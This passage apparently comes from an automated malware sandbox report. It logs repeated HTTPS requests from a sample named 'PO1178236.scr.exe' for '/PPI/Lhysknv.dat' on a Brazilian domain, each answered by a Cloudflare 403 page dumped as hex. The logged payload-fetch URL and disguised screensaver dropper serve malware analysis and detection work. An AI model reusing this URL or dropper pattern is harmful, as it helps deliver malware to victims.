        Expires: Thu, 09 Jan 2025 07:37:17 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5xLAAn1kzRC1urpHAkP9fpgeKB45TmfVmB3m24xv8UapdZLl34V78PHAs3rmbpkQZE%2BOF3stmLRTJWaGBN70qFWEq3UfEVN%2B39oYrsnXDyNiul4t5PmLq29%2F5L4lUMcoDVa03YPy%2BVWuM2Dh"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c27c58c941ad-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=637&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1718658&cwnd=189&unsent_bytes=0&cid=00100bee46c46216&ts=134&x=0"
        2025-01-09 07:37:02 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:02 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:37:02 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:37:02 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 37 63 35 38 63 39 34 31 61 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c27c58c941ad</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:37:02 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 37 63 35 38 63 39 34 31 61 64 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 79 4d 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c27c58c941ad',t:'MTczNjQwODIyMi4wMDAwMDA='};var
        2025-01-09 07:37:02 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        107192.168.2.949816188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:02 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:02 UTC1015INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:02 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:17 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZ1fPwoK%2Bq4Mz1ynW2o6YQh3%2BZG1WjOXC5gvSf8C9ohEewxRFCRfqENSZ8SOCPxwC5Ahz%2BFUvPJWese6b%2Bx3J1g%2FYl5GA4NsHHXEhTZOaUs2dy%2FtuoQUZDGr8HSPIb4yUic%2BTQTqyUHwK%2FrF"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2802a89438c-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1563&rtt_var=591&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1842271&cwnd=245&unsent_bytes=0&cid=bf35463a8c396398&ts=138&x=0"
        2025-01-09 07:37:02 UTC354INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:02 UTC1369INData Raw: 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22
        Data Ascii: | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="
        2025-01-09 07:37:02 UTC1369INData Raw: 2d 73 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21
        Data Ascii: -section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div><!
        2025-01-09 07:37:02 UTC1369INData Raw: 20 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 38 30 32 61 38 39 34 33 38 63 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73
        Data Ascii: sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2802a89438c</strong></span> <span class="cf-footer-separator s
        2025-01-09 07:37:02 UTC1008INData Raw: 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 38 30 32 61 38 39 34 33 38 63 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 79 4d 69 34 77 4d 44 41 77 4d 44
        Data Ascii: pt> window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2802a89438c',t:'MTczNjQwODIyMi4wMDAwMD
        2025-01-09 07:37:02 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        108192.168.2.949817188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:03 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:03 UTC1013INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:03 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:18 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BPl%2BR4e34umRQWdpxP5t3iS4aPTQi4Q3uOqlkINZl6CsPYqJ7xKX31GCJK2%2B1iTb6JROZjHqE%2F%2Ff0SFqIzlb0WAkvCz7n%2F7ywVp5IbNujUyvfxt%2FkjX2WY0edlzu7YfHk4oZp4ZfoBoOnI3"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c28428db0c80-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1464&rtt_var=559&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1941489&cwnd=227&unsent_bytes=0&cid=173abd5e1de96032&ts=132&x=0"
        2025-01-09 07:37:03 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:03 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
        2025-01-09 07:37:03 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:37:03 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 38 34 32 38 64 62 30 63 38 30 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c28428db0c80</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:37:03 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 38 34 32 38 64 62 30 63 38 30 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 79 4d 79 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c28428db0c80',t:'MTczNjQwODIyMy4wMDAwMDA=
        2025-01-09 07:37:03 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        109192.168.2.949818188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:03 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:04 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:03 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:18 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rFJiaPClLgSFjKbgR2mkyG2%2FaNNc6sTlUyhTNdl5bFtCN8OVm%2FpGAO3ahChVy8ZgPZ2I0JlzrQ6ts3pAyyZXJhNu7Hp%2FWP7V4mmfWtgbAETBWhGz1llu6UE6Sp9RQTkzFjvmk20b3xDlb2Og"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c287e918422b-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2238&min_rtt=2222&rtt_var=866&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1240968&cwnd=220&unsent_bytes=0&cid=3be42c6b188632de&ts=135&x=0"
        2025-01-09 07:37:04 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
